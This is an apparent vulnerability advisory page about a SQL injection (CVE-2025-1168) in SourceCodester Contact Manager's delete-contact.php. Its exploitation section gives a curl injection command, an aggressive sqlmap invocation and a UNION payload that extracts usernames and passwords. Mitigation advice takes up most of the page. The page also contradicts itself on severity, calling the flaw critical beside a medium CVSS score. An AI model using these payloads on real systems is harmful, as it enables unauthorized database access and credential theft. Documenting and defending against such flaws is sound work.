SourceCodester Contact Manager, SQL Injection, CVE-2025-1168 (Critical)

How the CVE Works:

CVE-2025-1168 is a critical SQL injection vulnerability found in SourceCodester Contact Manager with Export to VCF 1.0. The flaw resides in the `/endpoint/delete-contact.php` file, specifically in the `contact` parameter. Attackers can manipulate this parameter to inject malicious SQL queries, potentially allowing unauthorized access to the database. The vulnerability is remotely exploitable, meaning attackers can exploit it without physical access to the system. Publicly disclosed exploits increase the risk of widespread attacks. The CVSS 4.0 score of 5.3 (MEDIUM) reflects the potential impact, including data leakage, data manipulation, and unauthorized access.

DailyCVE Form:

Platform: SourceCodester Contact Manager
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 02/10/2025

What Undercode Say:

Exploitation:

1. Exploit Command:

curl -X POST "http://target.com/endpoint/delete-contact.php" -d "contact=1' OR '1'='1"

2. Exploit URL:

Replace `target.com` with the vulnerable server’s domain or IP.

3. Manual Testing:

Use tools like Burp Suite or SQLmap to automate SQL injection detection:

sqlmap -u "http://target.com/endpoint/delete-contact.php?contact=1" --risk=3 --level=5

4. Payload Example:

contact=1' UNION SELECT username, password FROM users--

Protection:

1. Input Validation:

Sanitize and validate all user inputs to prevent malicious SQL queries.

2. Prepared Statements:

Use parameterized queries in the application code:

$stmt = $conn->prepare("DELETE FROM contacts WHERE id = ?");
$stmt->bind_param("i", $contact_id);
$stmt->execute();

3. Web Application Firewall (WAF):

Deploy a WAF to filter out SQL injection attempts.

4. Patch Management:

Regularly update the software to the latest version to mitigate known vulnerabilities.

5. Database Permissions:

Restrict database user permissions to minimize damage in case of exploitation.

6. Logging and Monitoring:

Enable detailed logging to detect and respond to suspicious activities.

7. Security Headers:

Implement HTTP security headers to harden the application:

[http]
Content-Security-Policy: default-src ‘self’;
X-Content-Type-Options: nosniff;
[/http]

8. Vulnerability Scanning:

Use tools like Nessus or OpenVAS to scan for vulnerabilities regularly.

9. Code Review:

Conduct regular code reviews to identify and fix security flaws.

10. Disclosure Reporting:

Report vulnerabilities to the vendor and follow responsible disclosure practices.

References:

• NVD CVE-2025-1168
• SQL Injection Prevention Cheat Sheet
• SQLmap Documentation

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-1168
Extra Source Hub:
Undercode

Image Source:

Undercode AI DI v2